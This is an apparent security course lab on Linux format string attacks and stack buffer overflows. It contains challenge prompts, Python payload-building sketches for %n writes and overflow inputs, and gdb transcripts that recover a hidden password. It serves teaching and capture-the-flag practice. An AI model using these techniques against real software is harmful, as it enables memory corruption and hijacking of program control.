Linux Buffer Overflows and Advanced Format String Attacks

Learn advanced software security exploitation techniques including format string attacks and buffer overflow vulnerabilities on Linux systems.

Lab Overview

In this lab, you will face some additional challenges designed to help you develop your understanding of software security and vulnerabilities. You will learn how to perform format string attacks, which exploit the way a program handles format specifiers in order to read or modify its memory. Additionally, you will further explore buffer overflows, a common security issue that arises when a program writes more data into a buffer than it can hold, overwriting adjacent and possibly critical data.


Contents

    Lab overview

    This week’s topic involves a practical exploration of exploits on Linux-based systems. The practical challenges involve exploiting buffer overflow vulnerabilities and a format string vulnerability. Three flags are available from MetaCTF challenges: two for challenges involving buffer overflows and one that requires you to perform a more advanced format string attack.

    Format String Attacks

    ==VM: On your Desktop Debian Linux VM==

    ==action: Browse the challenges directory==

    ls ~/challenges
    

    When you run each program it will give you instructions and hints on how to solve the challenge.

    ==action: Run each of the challenges (always after changing to the directory first)==:

    Following on from prior labs, this week includes another format string challenge. Similar to the previous challenges, this executable was compiled with stack protections and ASLR disabled.

    Direct Memory Access

    The $ symbol in a format specifier (for example %4$x) lets us select a specific printf argument by position, and therefore a specific value on the stack, directly.

    ==action: Experiment with the input in order to see which element on the stack we control==. We can do this with the direct lookup ($) rather than manually calculating the offset.

    ==hint: e.g. “AAAA%4$08x”==
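
    The probing step can be scripted. The sketch below is only an illustration: the helper names probe and marker_as_hex are made up for this example, and the range of indices tried (1 to 8) is an arbitrary assumption. It builds one probe string per argument position and shows the hexadecimal text to look for when a 4-byte marker is read back as a little-endian word.

```python
import struct


def probe(marker: str, index: int) -> str:
    """Build a probe such as 'AAAA%4$08x' that prints printf argument `index`."""
    return f"{marker}%{index}$08x"


def marker_as_hex(marker: str) -> str:
    """Hex text that %08x prints when the 4-byte marker is read as a little-endian word."""
    (value,) = struct.unpack("<I", marker.encode("ascii"))
    return f"{value:08x}"


# Assumption: the marker is found somewhere in the first 8 positions.
probes = [probe("AAAA", i) for i in range(1, 9)]
for p in probes:
    print(p)

print("look for:", marker_as_hex("AAAA"), "or", marker_as_hex("ABCD"))
```

    If a probe is passed through a shell instead of being typed at the program's prompt, put it in single quotes so that the shell does not try to expand the $ sequences.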

    cd Ch3_Format5_nTargetWrite/
    
    ./Ch3_Format5_nTargetWrite
    
    Previously, we placed the address to write to onto the stack so that it
    was easy to discover and target with %n.  Unfortunately, this will not
    always be present.  However, because the input string being used in the
    printf call is usually stored on the stack, it is possible to inject the
    address we want to write into as part of our input and then use a targeted
    %n to write into the injected address. To do so, you will first locate
    where the input string characters are located on the stack relative to
    the vulnerable printf call by injecting a well-known string and then using
    a series of %x format specifiers to determine its offset on the stack from
    the printf call.  To do so, use an input string similar to:
       "ABCD-%x-%x-%x-%x-%x...."
    Look at the resultant output to see where the hexadecimal representation
    of ABCD appears (e.g. 44434241 for little-endian machines).  Once we find
    our input on the stack, note its parameter number since this is the
    number we will then target with a subsequent %n.  After noting this number
    we can then replace the "ABCD" part of the input with an actual address.
    At this point, we need to find what address to write to and the value
    we need to write.  For this level, you are asked to overwrite a variable
    called key with a specific number.  To determine the address of key and
    the value to write into it, examine the disassembly of the program.
    Locate the comparison that determines whether or not the level has been
    completed.  The value of key is moved from a specific memory location
    to a register before being checked against a specific value.  Note that
    we have made the address of this memory location representable as an ASCII
    string to make things easier for you to input as a string.  By using this
    in place of ABCD, you will then be able to follow it with an appropriately
    calculated %<num1>x%<num2>$n to solve the level.
    
    The key should equal to 265.
    Enter the password:
    

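
    The arithmetic behind the final %<num1>x%<num2>$n input can be sketched as follows. This is a minimal sketch under stated assumptions, not the solution to the level: the address bytes WXYZ and the parameter index 7 are hypothetical placeholders, and the function name build_write_payload is invented here. It also assumes that the address is the first thing printed and that it contains no zero bytes. Since %n stores the number of characters printed so far, the width of the %x field has to make up the difference between the target value and the length of the address.

```python
def build_write_payload(address: bytes, param_index: int, target: int) -> bytes:
    """Return address + %<pad>x + %<param_index>$n so that %n stores `target`.

    %n stores the count of characters printed so far, so the address bytes
    plus the padded %x field must add up to `target`.
    """
    pad = target - len(address)
    if pad < 8:
        # %x can print up to 8 hex digits for a 32-bit value, so a narrower
        # field would not give a predictable character count.
        raise ValueError("target too small for a single padded %x")
    return address + f"%{pad}x%{param_index}$n".encode("ascii")


# Hypothetical placeholders: replace with the address of key found in the
# disassembly and the parameter number found by probing.
EXAMPLE_ADDRESS = b"WXYZ"
EXAMPLE_INDEX = 7

payload = build_write_payload(EXAMPLE_ADDRESS, EXAMPLE_INDEX, 265)
print(payload.decode("ascii"))
```

    With a 4-byte address and a target of 265, the field width comes out as 261, because 4 + 261 = 265.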

    Buffer Overflows on Linux Systems

    Some programming languages require the programmer to manually manage memory. This involves defining how much memory is allocated for a variable to store data in. Programmers can make incorrect assumptions whilst reserving memory for variable-length pieces of data.

    If a user can supply data which is insecurely copied to a memory location which is not large enough to contain it, adjacent memory can be overwritten.

    If the memory location being written to is stored on the stack (i.e. as a local function variable or a function parameter), adjacent memory may contain critical data that is used in the control flow of the program. A prime example of this is the return address, which is pushed onto the stack when a function is called so that the program knows where to return to. If we can overwrite this address, we can make the program return to another location.
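
    The effect can be modelled without touching a real process. The sketch below is a toy model only: the 16-byte buffer size, the frame layout (buffer, then saved frame pointer, then return address) and all addresses are assumptions chosen for illustration, and real layouts depend on the compiler and architecture. It shows a copy with no bounds check running past the buffer and replacing the stored return address.

```python
import struct

BUF_SIZE = 16              # assumed size of the local buffer
ORIGINAL_RETURN = 0x400A00  # hypothetical address the function should return to
HIJACKED_RETURN = 0x400B00  # hypothetical address chosen by the attacker


def make_frame(return_address: int) -> bytearray:
    """Model a frame as [buffer][saved frame pointer][return address], low to high."""
    saved = struct.pack("<QQ", 0x7FFFFFFFE000, return_address)
    return bytearray(BUF_SIZE) + bytearray(saved)


def unsafe_copy(frame: bytearray, data: bytes) -> None:
    """Copy `data` to the start of the frame with no bounds check."""
    frame[0:len(data)] = data


def saved_return_address(frame: bytearray) -> int:
    """Read the 8-byte little-endian return address stored after the saved frame pointer."""
    (addr,) = struct.unpack_from("<Q", frame, BUF_SIZE + 8)
    return addr


frame = make_frame(ORIGINAL_RETURN)
before = saved_return_address(frame)

# 16 bytes fill the buffer, 8 bytes cover the saved frame pointer,
# and the last 8 bytes land on the return address.
overflow = b"A" * BUF_SIZE + b"B" * 8 + struct.pack("<Q", HIJACKED_RETURN)
unsafe_copy(frame, overflow)
after = saved_return_address(frame)

print(hex(before), "->", hex(after))
```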

    Buffer overflow CTF challenges

    cd Ch3_07_StackSmash/
    
    ./Ch3_07_StackSmash
    
    One way attackers used to leverage buffer overflow bugs to gain control of
    a running program is to overwrite the return address of the function being
    executed on the stack.  When the function returns, it returns to an address
    the attacker chooses.  In this level, you are to overflow the buffer being
    used to read in the password in a way that overwrites the return address of
    the function it is in (unsafe_input).  A quick strategy to determine the
    size of the unsafe buffer is to "fuzz" the program with a large sequence
    of characters such as (AABBCCDDEEFFGG...) and see which ones appear during
    critical execution points such as the return from unsafe_input. To simplify
    the task of corrupting the return address, the location of the call you want
    to return to that unlocks the program is in the ASCII range.  Be mindful of
    endianness and ensure that you only overwrite the low 32-bits to point to
    the function you want to return to.
    
    Enter the password:
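
    The fuzzing strategy described by the level can be sketched in Python. Everything specific here is a placeholder: the observed bytes MMNN and the target address 0x00414243 are hypothetical values, not taken from the real binary, and the helper names are invented for this example. The sketch also assumes that the input routine appends a terminating zero byte, which is why trailing zero bytes of the address are left out of the input.

```python
import string
import struct


def fuzz_pattern(pairs: int = 26) -> str:
    """Return 'AABBCCDD...' built from the first `pairs` uppercase letters."""
    return "".join(ch * 2 for ch in string.ascii_uppercase[:pairs])


def offset_of(observed: str, pattern: str) -> int:
    """Offset in `pattern` of the characters seen, in memory order, in the return address."""
    return pattern.index(observed)


def ascii_address(addr: int) -> bytes:
    """Low 32 bits of `addr` in little-endian order, without trailing zero bytes."""
    return struct.pack("<I", addr & 0xFFFFFFFF).rstrip(b"\x00")


pattern = fuzz_pattern()

# Hypothetical observation: the corrupted return address holds the bytes "MMNN".
off = offset_of("MMNN", pattern)

# Hypothetical target whose non-zero bytes are all printable ASCII.
payload = pattern[:off].encode("ascii") + ascii_address(0x00414243)
print(off, payload)
```

    Because the machine is little-endian, the lowest byte of the address comes first in the input, so 0x00414243 is entered as the characters CBA.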
    
    cd Ch3_07_ScanfOverflow/
    
    ./Ch3_07_ScanfOverflow
    
    When receiving input from a user, it is important to limit the number
    of characters accepted so that the input buffer does not overflow.
    This level has the following code that is vulnerable to a buffer overflow.
        char buff[N];
        char guess[N];
        strncpy(guess,"REPLACE",8));
        .....
        scanf("%s",buff);
        if(strcmp(guess,password)==0)
    In the code, the password variable stores the password and the guess
    variable is filled in with the string REPLACE.  The strcmp is thus setup
    to always fail.  However, the user's input buffer (buff) is vulnerable to
    overflow since the scanf does not have a length delimiter associated
    with it.  In this case, characters beyond buff will end up in guess.
    Using the debugger, find what the password is, then determine the number
    of bytes needed to overflow the buffer.  Finally, generate an input that
    will overflow buff to place the password in guess.
    
    Enter the password:
    

    Tip: This challenge has a vulnerable scanf() call within the user_input(param) function. The call is vulnerable because there is no bounds checking and the user controls the input string. The program reads from stdin and stores the value in buff[n]; we can pass more than n characters into buff[], which overflows the buffer and lets us overwrite adjacent memory.

    First, run the program within gdb, e.g. gdb -q ./Ch3_07_ScanfOverflow (the -q flag is ‘quiet mode’, which doesn’t print the long copyright intro text). If we disassemble main, we can see that there is a call to user_input at main <+160>:

    serpent@p-26-220-10-vIM8-5-linux-bof-format-metactf-desktop:~/challenges/Ch3_07_ScanfOverflow$ gdb -q ./Ch3_07_ScanfOverflow
    
    Reading symbols from ./Ch3_07_ScanfOverflow...(no debugging symbols found)...done.
    
    (gdb) disassemble main
    
    Dump of assembler code for function main:
       ...
       0x000000000040138b <+153>:   lea    rax,[rbp-0x10]
       0x000000000040138f <+157>:   mov    rdi,rax
       0x0000000000401392 <+160>:   call   0x4011b2 <user_input>
       ...
    End of assembler dump.
    

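    The main function contains some print statements and this user_input call, which takes one parameter. Per the x86-64 Linux (System V) calling convention, the first parameter is passed in $rdi, so it is loaded there before the call. With execution stopped at the call instruction (the transcript further down shows Breakpoint 1 at 0x401392 in main), we can inspect it: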

    (gdb) x/s $rdi
    
    0x7fffffffdfd0: "M2Y4MDg4\b"
    

    Note: Interesting looking string, probably our password…

    ==action: We should then disassemble user_input to see what’s happening inside the function==.

    (gdb) disassemble user_input
    
    Dump of assembler code for function user_input:
       ...
       0x00000000004011fb <+73>:    lea    rax,[rbp-0x10]
       0x00000000004011ff <+77>:    mov    rsi,rdx
       0x0000000000401202 <+80>:    mov    rdi,rax
       0x0000000000401205 <+83>:    call   0x4010a0 <strcmp@plt>   
       0x000000000040120a <+88>:    test   eax,eax
       0x000000000040120c <+90>:    jne    0x401224 <user_input+114>
       0x000000000040120e <+92>:    mov    edi,0x40201c
       0x0000000000401213 <+97>:    call   0x401040 <puts@plt>
       0x0000000000401218 <+102>:   mov    eax,0x0
       0x000000000040121d <+107>:   call   0x401231 <printflag>
       0x0000000000401222 <+112>:   jmp    0x40122e <user_input+124>
       0x0000000000401224 <+114>:   mov    edi,0x402026
       0x0000000000401229 <+119>:   call   0x401040 <puts@plt>
       ...
    End of assembler dump.
    

    Next we should figure out what’s happening here. We want to work backwards from our printflag call and try to figure out what we need to provide to get there:

    • <+83> is a call to strcmp, comparing the strings pointed to by $rdi and $rsi

    • <+90> is a jump-if-not-equal instruction, which jumps to <+114> if the strings do not match

    • <+107> is our call to printflag (the win function), which runs if the strings match

    • <+114> loads some data into $edi, which is used as a parameter for…

    • <+119> printing the ‘Try again’ message

    So we need to find out how $rsi and $rdi are populated prior to this strcmp call at user_input <+83>.

    ==action: Let’s set a breakpoint at the strcmp call at 0x0000000000401205, then inspect the registers without any input that would overflow the buffer==:

    (gdb) break *0x0000000000401205
    
    Breakpoint 2 at 0x401205
    
    (gdb) c
    
    Continuing.
    
    Enter the password: asdf
    
    Breakpoint 2, 0x0000000000401205 in user_input ()
    
    (gdb) x/s $rsi
    
    0x7fffffffdfd0: "M2Y4MDg4\b"
    
    (gdb) x/s $rdi
    
    0x7fffffffdfa0: "REPLACE"
    

    Note: OK, so we can see that the two parameters to strcmp point to the password (followed by a \b character, which is odd…) and the string REPLACE.

    Now we’ve got our breakpoint set up, we can pass in a long pattern string to see which of these registers we’re influencing (and here’s the misleading part…)

    (gdb) r <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")
    
    The program being debugged has been started already.
    
    Start it from the beginning? (y or n) y
    
    Starting program: /home/serpent/challenges/Ch3_07_ScanfOverflow/Ch3_07_ScanfOverflow <<< $(printf "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO")
    
    ...
    
    Breakpoint 1, 0x0000000000401392 in main ()
    
    (gdb) c
    
    Continuing.
    
    Breakpoint 2, 0x0000000000401205 in user_input ()
    
    (gdb) x/s $rsi
    
    0x7fffffffdfd0: "JJJJKKKKLLLLMMMMNNNNOOOO"
    
    (gdb) x/s $rdi
    
    0x7fffffffdfa0: "REPLACE"
    

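    Note: The $rdi and $rsi registers above hold the parameters that get passed to the strcmp function (i.e. pointers to the two strings being compared). Our input ends up in the string pointed to by $rsi, at the same address (0x7fffffffdfd0) that previously held the password, whereas the string pointed to by $rdi is still REPLACE. In other words, the overflow overwrote the password rather than guess.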
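
    The numbers in the transcript are enough to work out where the overflow lands. The sketch below uses only the pattern string and the two addresses shown by gdb above. It assumes that the first character of the pattern was stored at the start of buff, and the helper name overwrite_at is invented for this example. The last line builds one candidate input to experiment with; the transcript does not confirm that it completes the level, and the filler bytes also overwrite whatever lies between buff and the password.

```python
PATTERN = "AAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO"
SEEN_AT_RSI = "JJJJKKKKLLLLMMMMNNNNOOOO"  # output of x/s $rsi after the overflow
RSI_ADDRESS = 0x7FFFFFFFDFD0  # second strcmp argument (previously the password)
RDI_ADDRESS = 0x7FFFFFFFDFA0  # first strcmp argument (still "REPLACE")

# Number of input bytes consumed before the overflow reaches the password.
offset = PATTERN.index(SEEN_AT_RSI)

# Start of buff, assuming the pattern was written from its first byte.
buff_start = RSI_ADDRESS - offset

# Writes move towards higher addresses, so anything below buff is out of reach.
guess_is_below_buff = RDI_ADDRESS < buff_start

print(offset, hex(buff_start), guess_is_below_buff)


def overwrite_at(offset: int, value: bytes, filler: bytes = b"A") -> bytes:
    """Input that places `value` exactly `offset` bytes past the start of the buffer."""
    return filler * offset + value


# Unverified candidate: make the overwritten password equal to the fixed guess.
candidate = overwrite_at(offset, b"REPLACE")
```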

    Conclusion

    At this point you have:

    • Written a format string attack that overwrites a variable at a known memory address with a chosen value

    • Exploited some buffer overflows on Linux

    Well done!